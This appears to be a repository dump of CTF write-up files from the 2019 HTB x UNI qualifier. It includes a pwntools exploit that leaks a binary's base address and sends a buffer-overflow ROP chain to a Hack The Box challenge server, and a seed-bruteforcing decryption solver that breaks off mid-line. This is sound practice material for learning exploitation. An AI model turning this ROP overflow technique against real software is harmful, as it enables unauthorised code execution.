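├── 2019 └── HTBxUNI Qualifier │ ├── HTBxUNI_RWX_WriteUp.pdf │ └── files │ ├── lab.py │ ├── superseed.py │ └── tarzan.py └── README.md
/2019/HTBxUNI Qualifier/HTBxUNI_RWX_WriteUp.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RWX-CTF/ctf-writeups/a79f8493c6f0a1f141c82d4ed8de930985c67d6c/2019/HTBxUNI Qualifier/HTBxUNI_RWX_WriteUp.pdf
--------------------------------------------------------------------------------
/2019/HTBxUNI Qualifier/files/lab.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

import argparse
import pwn

from pwnlib.util.misc import run_in_new_terminal

# ====================================================================
# CONFIGURATION PARAMETERS
# These are to be adjusted to fit the challenge:
#   binary : path to a sample of the challenge binary
#   libc   : path to the libc the program uses (if known)
#   host   : hostname where the challenge is running
#   port   : port where the challenge is listening
# ====================================================================

binary = './lab'
libc = None
host = 'docker.hackthebox.eu'
port = 32435

# ====================================================================
# GLOBALS
# ====================================================================

T = None      # The Target
LIBC = None   # Libc ELF
BIN = None    # Target binary ELF

# ====================================================================
# CLASSES AND FUNCTIONS
# ====================================================================


class Target:
    '''
    Code that interacts with the challenge.

    Wraps either a local ``pwn.process`` or a ``pwn.remote`` tube and
    forwards every attribute it does not define itself (recvuntil,
    sendline, info, ...) to that tube.
    '''

    def __init__(self, remote, binary=None, libc=None, host=None, port=None, *a, **kw):
        '''
        Open the tube to the challenge.

        remote     : if true, connect to host:port; otherwise run binary locally
        binary     : path of the local binary (local mode only)
        libc       : optional libc to LD_PRELOAD into the local process
        host, port : remote endpoint (remote mode only)
        *a, **kw   : passed through to pwn.process (local mode only)
        '''
        if remote:  # Remote challenge
            self.tube = pwn.remote(host, port)
        elif libc is None:  # Local binary with the system libc
            self.tube = pwn.process(binary, *a, **kw)
        else:  # Local binary with the given libc preloaded
            self.tube = pwn.process(binary, *a, env={'LD_PRELOAD': libc}, **kw)

    def __getattr__(self, attr):
        '''
        Forward references to pwn.tube methods such as recvuntil, etc.

        Only reached when normal lookup fails.  ``tube`` itself is excluded:
        if __init__ raised before assigning it, looking it up here would
        re-enter __getattr__ and recurse until RecursionError.
        '''
        if attr == 'tube':
            raise AttributeError(attr)
        return getattr(self.tube, attr)

    def attach(self):
        '''
        Attach radare2 to the running process in a new terminal, then pause.

        Only meaningful for a local process; a remote tube has no PID.
        '''
        if isinstance(self.tube, pwn.process):
            run_in_new_terminal('r2 -AAA -d %d' % self.tube.pid)
            # raw_input() is not defined in Python 3 (see the shebang);
            # the original call failed with NameError as soon as it ran.
            input('PAUSED [PRESS ENTER TO CONTINUE]')

    # ================================================================
    # CUSTOM ACTIONS: For easy interaction with the challenge
    # ================================================================


def parse_args():
    '''
    Parse program arguments.

    -r/--remote : attack the remote target instead of a local process
    -p/--port   : remote port (defaults to the module-level ``port``)
    '''
    # ``port`` is only read here, so no ``global`` declaration is needed.
    parser = argparse.ArgumentParser(usage='%(prog)s [OPTIONS]')
    parser.add_argument('-r', '--remote', help='Attack to the remote target', action='store_true')
    parser.add_argument('-p', '--port', help='Remote target port', nargs='?', type=int, default=port)
    return parser.parse_args()

# ====================================================================
# MAIN -- FLOW OF THE PROGRAM
# ====================================================================

if __name__ == '__main__':

    # ================================================================
    # INITIALIZATION
    # ================================================================

    args = parse_args()
    if libc is not None:
        LIBC = pwn.ELF(libc, checksec=False)
    if binary is not None:
        BIN = pwn.ELF(binary, checksec=False)

    T = Target(args.remote, binary, libc, host, args.port)

    # ===============================================================
    # EXPLOIT STARTS HERE
    # ===============================================================

    # Useful gadgets (offsets relative to the binary's load address).
    POP_GADGET = 0x1402  # pop edi; pop ebp; ret
    MOV_GADGET = 0x1216  # mov dword [edi], ebp; ret

    # (1) Get main() address: the program prints it, and subtracting the
    #     symbol offset gives the load address every other symbol needs.
    T.recvuntil('Main is at ')
    BIN.address = int(T.recvline(), 16) - BIN.sym['main']
    T.info(f'base @ {hex(BIN.address)}')

    # (2) ROP chain:
    #   - Set userid to 0x1337
    #   - Set labOwner to 'QHpix'
    #   - Call checkLabOwner to print the flag
    # Every store is the same gadget pair: pop edi (destination) and
    # pop ebp (value), then mov [edi], ebp.
    def rebase(offset):
        ''' Pack a binary-relative offset as an absolute 32-bit address. '''
        return pwn.p32(BIN.address + offset)

    def store32(dest, packed_value):
        ''' Gadget sequence that writes one 4-byte value to ``dest``. '''
        return rebase(POP_GADGET) + pwn.p32(dest) + packed_value + rebase(MOV_GADGET)

    rop = store32(BIN.sym['userid'], pwn.p32(0x1337))
    rop += store32(BIN.sym['labOwner'], b'QHpi')
    rop += store32(BIN.sym['labOwner'] + 4, pwn.p32(0x78))  # 'x' plus NUL padding
    rop += pwn.p32(BIN.sym['checkLabOwner'])

    T.sendlineafter('Enter your input: ', b'A' * 0x4c + rop)
    T.success(T.recvall())
--------------------------------------------------------------------------------
/2019/HTBxUNI Qualifier/files/superseed.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# *.* coding: utf-8 *.*

import random
import struct

'''
Challenge superseed - Hack The Box - CTF
'''


def solve(seed, cipher):
    '''
    Print the plaintext recovered from ``cipher`` under ``seed``.

    After re-seeding the global generator with ``seed``, each character
    of ``cipher`` is shifted back by the next ``random.randrange(512)``
    value, in order, and the result is printed rather than returned.
    '''
    random.seed(seed)
    # Generator expression keeps the draws in character order, so the
    # sequence of randrange() calls is the same as a plain loop.
    plain = ''.join(chr(ord(c) - random.randrange(512)) for c in cipher)
    print(plain)


def bruteforce(cipher):
    # Subtract each character from 'HTB{' from the ciphertext to get the
    # key's first four numbers.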
24 | key = [ ord(cipher[i]) - ord(c) for i, c in enumerate('HTB{') ] 25 | 26 | try: 27 | for i in range(0, 0xffffff): 28 | print(f'\x1b[K[*] guess : {hex(i)}', end='\r') 29 | random.seed(struct.pack('